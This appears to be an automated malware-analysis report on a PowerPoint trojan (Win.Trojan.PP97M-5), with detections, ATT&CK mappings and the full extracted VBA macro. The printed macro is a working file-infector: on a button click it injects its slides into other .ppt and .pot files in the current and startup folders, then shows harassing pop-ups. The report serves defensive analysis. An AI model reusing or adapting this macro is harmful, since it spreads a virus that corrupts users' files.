Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Win.Trojan.PP97M-5. It contains VBA macros that, when executed via the 'milenium' button click, attempt to inject the current presentation's slides into other PowerPoint files found in the active presentation's directory and the application's startup path. The script also displays several aggressive pop-up messages to the user.
Heuristics 2
- ClamAV: Win.Trojan.PP97M-5 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.PP97M-5
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1864 bytes |

SHA-256: 411742f6b1255ab1dfbf52207af91014ae0f65c491ac42c61d59adc591f4a80f
Detection
ClamAV: Win.Trojan.PP97M-5
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Slide1"
Attribute VB_Base = "0{91493445-5A91-11CF-8700-00AA0060263B}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "milenium, 1, 0, MSForms, CommandButton"
Private Sub milenium_Click()
Application.ScreenUpdating = False
hpath = ActivePresentation.FullName
With Application.FileSearch
.NewSearch
.LookIn = ActivePresentation.Path
.SearchSubFolders = True
.FileName = "*.ppt"
End With
For cq = 1 To Application.FileSearch.FoundFiles.Count
Set futureh = Presentations.Open(Application.FileSearch.FoundFiles(cq))
If futureh.Slides(1).Name <> "DarkPoison" Then
futureh.Slides.InsertFromFile hpath, 1, 1, -1
futureh.Save
End If
futureh.Close
Next cq
With Application.FileSearch
.NewSearch
.LookIn = Application.StartupPath
.SearchSubFolders = True
.FileName = "*.pot"
End With
For cq = 1 To Application.FileSearch.FoundFiles.Count
Set futureh = Presentations.Open(Application.FileSearch.FoundFiles(cq))
If futureh.Slides(1).Name <> "DarkPoison" Then
futureh.Slides.InsertFromFile hpath, 1, 1, -1
futureh.Save
End If
futureh.Close
Next cq
Application.ScreenUpdating = False
If Minute(Now) = Int(60 * Rnd) Then
MsgBox "Every time that AntiVirus companies detects a virus," & vbCr & "we(the VX xcene) come up with a new infection tech.", vbCritical, "Yozak in the new MILENIUM"
MsgBox "Our scene is too active for you!" & vbCr & "So lamers get the hell out of here" & vbCr & "You make me sick", vbOKOnly, "Yozak in the new MILENIUM"
For v = 1 To Int(5000 * Rnd)
Beep
MsgBox "Lamers BEWARE !!", vbApplicationModal, "Yozak in the new melium"
Next v
MsgBox "YOZAC enters the new milenium with a DARKPOISoN!!!!", vbMsgBoxSetForeground, "DARKPOISoN"
End If
End Sub